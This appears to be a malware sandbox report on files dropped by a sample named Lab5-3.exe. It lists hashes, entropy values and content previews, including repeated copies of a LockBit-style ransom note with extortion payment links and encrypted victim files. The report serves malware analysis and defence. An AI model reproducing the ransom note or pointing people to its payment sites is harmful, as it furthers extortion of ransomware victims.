                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):4544
                                                                                                          Entropy (8bit):7.95697578502425
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:U4f9ZpDhwhYY6H1ll6hpwpVehb516U2oznTCOBGx0uKeY2ElUJ:U4f9jmSY6V36h2pMmInTC/0Cb
                                                                                                          MD5:0614FF069BF0A166E0DD89EA2AFEF5A3
                                                                                                          SHA1:4986461C1ED3B7FAE8A521D5356046969C7469D3
                                                                                                          SHA-256:FF41C55443515CDD94971546C6288626DD2527377371D5AF5E304A5D8C92AE3F
                                                                                                          SHA-512:1D69C23BB9D651A558466C3F64D1FA4B483FED85B651F04E8F102E98E766BED27ECE0A950B84F38E41A2354B6D3C35B4960F3B345BFAEC046D515F880D5A19E0
                                                                                                          Malicious:false
                                                                                                          Preview:..j.hdC........o.7...P..`. ...}.`..ML:J...,$......}.......q....w.X..{N..l...V.u..l..$...Or...^.5...2r.|......s.K.r.BB.B. c..zyl.6.?6M..jD...Ys.F.4..~.S..X..jq..D...5.;........i.c..eG....i....s..k....4.....@y..3..JIGJ..<..|(P........a..;:}..~.h...B.d.XQ*2...}....w1..3.....9..&...1.C........=..k...........3I....@96.(.wF......<q...:Y..P..w,.....C....a-J./&..d]vK.-.x.oZ..h;!..{..H.}@e@.Tx.}P/..o......e@.N.s.p. .....|.H'.8..I.....6...qE.QH+.W..R)..Q.c....W-.C.iV.ro.^Q../)9.....U.6...sY.Kz..,...%*..#........k...1.:.....b4s....c .V.r`7.....:.o............{.D.FL...$1.X...V!....fR..A.... ..Z.t.|.........Q..6....*.Pz=A..b...S..;....^.....h.d.........{.f. o.HB...H.t..$3".*...#...r.......6.!..<o9..*.Ys...7xy...v44..j...K..y=LF..R:l.r:.[..&.w...[>X=.'R.j.....,^....T..|..b..6.bv...o......&...<..po_}..Q7S_.,amkn......;+...!..)......p..9....H+./.$...q......~C...D.H.sb%..3@9....~Z"..W....V...3.*....'..p..o.).B..ys.d.*....i.C..?.T......~/..0..(.z...M
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):17312
                                                                                                          Entropy (8bit):7.988660863527733
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:lkQpBKoX+nxJHUXBnSp3jYoB9UjgC1uO7y07Jz/wTZJZiFa+X/tb:lk8XkJw5e33wgCPy0Nz4VJZi5X/Z
                                                                                                          MD5:498569AB497B17512DC9C353177456B0
                                                                                                          SHA1:D6B1957626B0506D247B23DE2112A6A55B37C0C6
                                                                                                          SHA-256:3FBFF735BD5C80C3C8059E72503733B33F497389CB06E7E9A2747FFED1B83C93
                                                                                                          SHA-512:8C8F57FE4B11B69A09980273D28AFBA296C405DE653BD8281E6CAC795A3E13BC854CC6B8FF6BF17881218DFC0B4F3313578528897F7EE58FBF8CE82451C07B85
                                                                                                          Malicious:false
                                                                                                          Preview:...U.e2H.m...o.M?..._.9.. M.++X.3h..9..........oB........M...$k7jZ....^sW..._...>.1c.4e.`...W....W............jZD.......{.6..i.6.J.....&..d.6..T.Y}._m..]..R.@..w..........f...c..3......^@....7........-sy.?......2.....-..'Wu#.m.+..(.;H.t...........Z.....t....zm.T........g.k. ^..R........<.8...1...a.....p...G"rQ8...QO^.M.x..G.r];.V.V.~E..]..uH..[....&....5mD<sD.lc....r&..?[.U..47....g..?..OR.?.3.7xqZ.#"y....*.... .....u.@Z.u;.Wy 1....&..$...../.q......v.a.8..I.t....,..|..s.K-.B...r1..i.n.c..UT5l...&.Q...7..y{.Q.Z..^.Jb}.JG...x...1n.gu...z/Thd.....>*..n1.9.Rl.GA..".O.v...mm.M.F){5.&V.r.........L\l_<C..U.b>}...u Q.\.<....2.....0d'..C.Vo....8..|.g.eHz...J....}....=..l_a.;...k.o..@...*.|.,r....T-.4.......|....Z.^7.MaJ.....s<...M..-..(W.XY.*T+]P.P'n.O79.W...uH(.Jr.s-&#..>[.......T.....c..z.!..(.).~.z..}5.1k.5...X@;.p.n.I...A..<?.&..../...^.)...=!3uU...........r..D....`...k.P2F..~......:&.6.TnFa.^:......4p.~..S.4.(Sw...&.....].[.......{B...on
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):30976
                                                                                                          Entropy (8bit):7.994062025010978
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:E6rf3L0t9uWAxH0TKb6PyXlJWc1cPJsbUDIzdzp1EqZsbZ:33LWTKb6wlscchsA0Kq2Z
                                                                                                          MD5:C68EB8916EFA0F66F897FC929B983DBD
                                                                                                          SHA1:F80D1FEF47A5CC5E2E455F5D99F6C518F3A44B9A
                                                                                                          SHA-256:17C1EB32CB444CD3605BFA20D56CDCC2959843116057EE394DB0101C40996E69
                                                                                                          SHA-512:52A47143D6902A96CE02E5D4F4EA442C588E81C7F9C5B60354E6FBE133A1A44016E7EBA93E64C869DC34629D091BA1A66E2304ECE60369C38D854DC4BA090E9E
                                                                                                          Malicious:true
                                                                                                          Preview:..gi.....~.TOd.md...}....'....1...(..uh.sI.L.4^....D..z..3.M%..2.a.1....S......4N.eo.&..a.X.PP...........RZ........>.K..c{4].......S..[.!3.<s.Cf...&.gt}./g.0..N@..M.q.....a.MT..:.D.(@`.e.M.:$..i..Oq4chm^..0.........Q....Ds...\...+.G..C=.fg3...g$.|.....,)....}x.J..c{Mn.W...?Qr#X...J......'Ta....Z...>.Y+.$o.7... 01C.`..(2...0......c.0.q....\.\U.1...E..I.B..m..=..6i...k..'0.8.<.'..x.......s..@.Z..>Y...T".-%..U,2..-}..a2F.. ..O,..H.OP..q{^.q.}..N|.>....0?n..y..~.j...Ft......F..!..4s_E..|../@XN.-.M.#...i.>y2_..x....x............4N..G..c..f...W..!..^..~..S..."L].Y..Y.b.9VdC..l..l...2v.....4...2;IK.`.f,.8d.]..]2>.m..o-VQ.xp.K)...:...>{..vJ.H..'.Y.7P.#L.vVW06.<.a!2.|....'..q.t..e.d.-..E...V{.!G.'.9}-e..V..]...l.i.j.. ......T..e....I9Y,c.bj..W.........I...l...{......e.b... 6...?.]@..x.......S.G.gi.Mv.g..-.T:..............;d`...v.@..J:...7=.1..*I.1.....)D5..N.@0.....tn.,N...........?..l.R=A....}......tCe...k...3t7..[.!q.I.EL.....^.~?..i....k.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):27808
                                                                                                          Entropy (8bit):7.99345118301816
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:z4jsPAwJ0dlauqYdTkDLdmgJZKlN3BmfVMfZZ:5PN/uqKTkDBmgJcwMxZ
                                                                                                          MD5:4BAF6BCB14D39C0E933B1437D6F9254C
                                                                                                          SHA1:791345C7482C7B42284C2340897627277BB9BCC5
                                                                                                          SHA-256:E345A34D09BF12C4AAA79B0053C43F91FD2076778AF90D7B2FBFA3FF1A56EE96
                                                                                                          SHA-512:22923A5E9CB26CABD514375625F8C507E694B9CCE8DFAE9FBC052FF0D78C9A7E6AE766471BB617B138924AB920A240E107A76DA8347AB34BE5E868367A3E7F4F
                                                                                                          Malicious:true
                                                                                                          Preview:.L..z.HR.7K...;....@{.....3.....T.c..I..5..Q....Y.......k~x....f2......./%.^.L&S.3t.....*(......>.G...3....&:.x...3..\.'.k....g.Q.%.....5?...R#...5..P{(m..)=..Y'.U.1QA.k.u.\xzIv...d]..j....=n..ykZZn.c3.._H.I..tN...b.,....+...:.;...5S.SJ.*^O...Im4.Y.^k........fU....;...]....4)..t.......FJX......(.....1...r..J.....A"gb..c...b'p-]L.}`.....5..%x..Y.6H.....6j........6...+.N#.J..r............_.m7.F+ x.Fg.q...`....1l.......QSB.I.c..w._.H..x...yG..,...QgN4>b.]..3..s..lb.....c.[A..Za..z..I..4....;.T......Z.....-.Fp\.....q....z..f.....&..q...........k@.X..C.0fq....W^....]1...U-...9.....*.*.~.....V.o......M..q..e.T&...3...h.xw..HD..9.#..a.....TB...(..._..W.^.:V39.kA...A?k.D|....K.x..,.#.g.C......R*.xe.qc.A>.....q....[lGK......[ ....&.....1..+F.|.a.5.P.wLN!.4.6....Q..E2.J...\.B..Qks?_.(H..I..^..{.../...~@e..e..cJp.w....u.Q..g~........./....T.k.....j.R\c...,...C8..j.L.u.Yp...s..<....T.)....P.]...a.L).|.0F.<..o.!{..X$.V0.........].x..W....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):62928
                                                                                                          Entropy (8bit):7.996962531479387
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:1536:LtDi5KOauLX7EWe9vf88hfGEUZsJWGFcLBVeZGZ:ZDi5R6n88hWsJWCcLBVeEZ
                                                                                                          MD5:31B22E5243936F78EA6B668FA704640B
                                                                                                          SHA1:661585CD5E589D6D5EABCB560BB16D492FACF90F
                                                                                                          SHA-256:DB23616A58D4474D2A25065DA9D5B09348B0C8B2E9BEA637C5DB53DF883312D9
                                                                                                          SHA-512:73812921524574E4516DA9E32094F7249C9BE5E648311ACC71A223E258A0B7801F9BA69496BB155209C260DF5BD6F375211BF8F2CACCEE59A6268BF082E32C3D
                                                                                                          Malicious:true
                                                                                                          Preview:kC:....u.5.".2X.....I.......C..s...{O. \....s.......D..h......kY......|..}.x?..|H.%....T....+......o..Ik.. ..F...p..=..n.}z..KZ.Ij.6~ .z..{.D)..Pp.RR.`F.}......<Q......D.8.....K.7.$..e.h.....!.W.q.0j].q.....6N.Vo *...u.....W.r....^T..........?W.l...;........2..0i[K...z.9.'...K............D../.rT....#_..C....5...1..`'.a.G...O.~L...}..X...[d.:../.i5....up.a.S..!c...(>...e..8.[......r]*......0Q....".y....;...........=.w..kRog.7.....sWrh.Z..O.......k."....#MB..9......@0...V.P.}./.J^. .rj,.N.}.YM$].(.5M8}LLO....8...Z.}..XP.k...w.1.jm.......'...U.QO...y...$O.*.~............^.)..t...3..=s..h. ...p./h\..e[{.P...._IC8.b]...'../..Y.cv0...P.....[..B/..1_8..%.......2a.....IG...6&U.X...&F.jY.D3.%...'..l.]..C.l?sF....X6..)'#...Y.....;P..kl.e.^[K....J....+.2pR..8......=....-.f.O1.. <....,........:.._05/.*.._....9.\Nr..K...>]..nD..G.;..f.....]..v..Q.....N.c..6.=.......Fe.,b.b.W.(..g.;"...{._-.4.........CCz..u....~..@.X_.,....&Q...-d=..1
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):83632
                                                                                                          Entropy (8bit):7.997634771012213
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:1536:HIni5cyUmIhIwfCgocuyow/AO6L8jYcHjs8efZ:HB5JUFhzR7uIIHOHYfZ
                                                                                                          MD5:DDCCFAE5E4CBCD0B3FECF9AC49FBF710
                                                                                                          SHA1:9BACD82EF5735E34EDC2EECA6DEAAA337079974E
                                                                                                          SHA-256:FB37D8E7C50DEE7CDBF8E94E7E183BD0F60EF8286AB41369BC7FA08D5E660B38
                                                                                                          SHA-512:EE785EFA1C3B47CB16D453E0C9C407FF676BB6DDF672152E89DFA482FB35B3F38171C7A2D4893A6BB252E98AD7150243DE0BD68742AE15566F10A6B3B3246C7C
                                                                                                          Malicious:true
                                                                                                          Preview:e.%Sg.4'...v..N....U......$........8=...!........a.o.|...r..../>..}o._....]H..aC....D...l@.,..4.....28.BG.h. ..f.$....TV....h9.m5...$]d..##t.m=......@}...<......T.._'..1bc.E..V......>*...\..1.7.....lFR..BP..F$lk....c...k......9.z...W..u...k?T1[...c.!8...}fL...@...;>.uX.y...V`%......E.p6....[SW..s/L1..L.B..k...E..S*...c*.d.H...`O..gA..`J..8....6YH2`...,....M....U{;..E,.J..>..Qv0..A..0Fv.M.;....9A..Kru...r.(..1..{4..!.^....$.H.K?.0[......H'/.<U..$b..nf...jfH.%... \.....E..t...,..F....e6...$@"@.n..L.V.B.8+u .%C8....v..[..[^.C9b..?A}.i...z.........k.7.......ne.,.......<H]j#...x.....V&..tC..5.,=,Fd`.wDT6X|......5...E...3Q).......@.....&..&.%.r....o.~....*..gK]..@.K...$>.q@.....9.(..d~..AB......\+.*..[.3..u..S....pHm....I:B.TZ..'.a..G.N....Q...........1..W.W<...V...!.B+..[..Z-.+.x.n..Ds.gr..aE.]...B*..U7.....&Q~..-%`.w\.....zE.U.#^Z...C..I..../6..&..P...`gm..7N[.#..n].OnW.."gl.....^._...Z$.n..+.#....Z.1!.T..Jm....e..../...../......%..4.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):82208
                                                                                                          Entropy (8bit):7.997961084796449
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:1536:WhLOcCoLbf/5CGXk4a0+RYrI3wpSkWAaWds5qOVoShv1BwOKFe7ckfBZ:cOPoLzn+RYKALIqOVz1wcBpZ
                                                                                                          MD5:153248FFB03D7D355FEF4E69026D3E8B
                                                                                                          SHA1:39C6C4922ECA05F86F87178243557D82D895002A
                                                                                                          SHA-256:AE52F647DFAF1253D9AA8F4769CFFC4B25154D01F36418FBEB1904D87AAEA938
                                                                                                          SHA-512:C27CD47100124DFA85CAC866C5A970F9515BF2D0582BD721CB3093F72D1C6305BE910956E110CB565BD27EEF4D562436E08E136666DBB0AE3A0DA8EAB6A2D45C
                                                                                                          Malicious:true
                                                                                                          Preview:0.q8...JT.:^,./G(..1.8......2H..E'.-..TJ..d..0..G...T..c...,.7?E...M.......H..5.h.H....wa@?..z..q..T.OS.GVXgA.....+7.*........X.......^..WN....c.....O..........a_.L].<...7..Qc..kl.7.u.Yp....M._.n.e.&w..(.....?..)Q.........+.....Z.$y..,....g....l.....h..V..[.......s.at.....ST.....e...\e.U.N....4...|....Xn...l...............S..d...NAj0.H..vP. ....@H?h..[.O...../..........O.n.w...Y.&4..(k.. ..^.sf...F"...E.........N@..{.3.G.>.vW7.Dy.{A...q$...Sj_.....n._K....Q..8..iW...<..^;......7TwF.&...D..K.b....}.7lL.2c....?n./6..c...M.t..J.:..Y*.4...u.....E...if6a..TnsMr...@6..5....8....5.&.eiq..\..5.....Sl.e..>..o|v.....E\.|.c.3M..Q.;.d[..(.).A..5SI...NB.\..E.Jy&s(H..t.......C..q..k.+......<.Q.......<.g......X.q.f..Pj]^F@...^...SD..P.......XTf.......}......T.6.hE.#..k...1.#3.~..5..{<...DP.=8..r.RUeS....l2..rc......>J'M..9x..f|.y..7.t...E.^.F....{i..`.h..........8....Ce9.U...b._...P5........h..sT.N.]..~P).v.V..'.>\.m......\.l.+.@\..*7F.,_Yt..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):44368
                                                                                                          Entropy (8bit):7.995761622134524
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:ARMYJNpLugwScNIFkTQZoSjJFP1sRHFhaZKTnnJRkoNFTqtBH6E2MZ:REpa+cCGQuSj39sRlhaMjJRGtBHlZ
                                                                                                          MD5:F800B6841215318E9A17FE5D7F67E34D
                                                                                                          SHA1:3F789D0E995A6D093864681ED04F014C642B107E
                                                                                                          SHA-256:8958F11440A1EF006BFBFA14D48700FE3E8BE6B85BE3475E558C951D95ACFECC
                                                                                                          SHA-512:98F66BF7C7EC5416AC62C7100392B1613E1B1DA8784AD2A78BC3FE7F16DE76FD468C2E2B58E9F8F69C458242C2185656C361F30CA8D0A5EBDB1E34A7D8E97DAF
                                                                                                          Malicious:true
                                                                                                          Preview:N..b.......y...U.._....&..0X..[.A......E6Zm.W.d...S.,=P..E81.se9.o..W...-V...~...P.B..J.$$t.|C}..?7V.*9.......>..t..S./Y..E...+k..d....r.g.coCiN.......6e#.8+...7.)i....B..n...Q.~......&g..=...GJ......\e..!.....2....;.O..TN.-.<S.Z.B..\$.[H....\...k..2.@.53...;J.l].B..P......~T.a+s....8..9..:....MR..\qz....m.N.!4!o...&K....r1...v<.2....r...x...Y.....6b.e........+.]. CyV...v{...4...+....!.+d..{%/6.."....hx,.(F`Ii..)..w.].2...T.:*.l....v.gwd.....$.0....fP1....;...b.m.E.......j..[...J.......y;..W.[Os..52.Ho`M.A.+...P.".."L:.m.._.^......g.\:3....G..U.6..S..Tu.J.i^..%q..6.4.........R<4.7"6.Q".a..q.q1.!.}`~hR..4x..@......`e.[...._D....r..8.mI.Z d.>%.A.e:_.............M...k....6.4sa.....eK..5N].ih......^j.6......2..h.d.....Sw.'^*........P.p8.q sB.y..3....w[..L.3!..N...p-B...9j.Y..bY..&*.].>..NS...Z.?.>.rK{.p....Z.._..4....e...&z...A'9s%.o......#...;.k...W.....4%...e...<.[1.... M.-.[.6.N..t.bv.Ti........k9K.)Q.uC.........>w...Cu........
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):43728
                                                                                                          Entropy (8bit):7.996185110489858
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:5Q3vTsirxLGM8PRIacag2KSprYoqMfFk2rLPViSx67czZ:W3vIGcM8pIaPgfSlYOfzN16AzZ
                                                                                                          MD5:5DF803E52FCE54999E6A084DFEF95F13
                                                                                                          SHA1:8FAB079DE70CA7F5FC9A204CB9190E604CE54D93
                                                                                                          SHA-256:FF71BB6B539C9674692017F011D1AF37F33934F72E520B1EFCE8A9E476E358DE
                                                                                                          SHA-512:9B4114DA8CBD3CE0C276CAA0383957D95E593B40A53B84F0D2D612DA7691E96DE1783E7D058E933F6CB0B879087DE804950EB7B7E96C3099981C43BF8844A30D
                                                                                                          Malicious:true
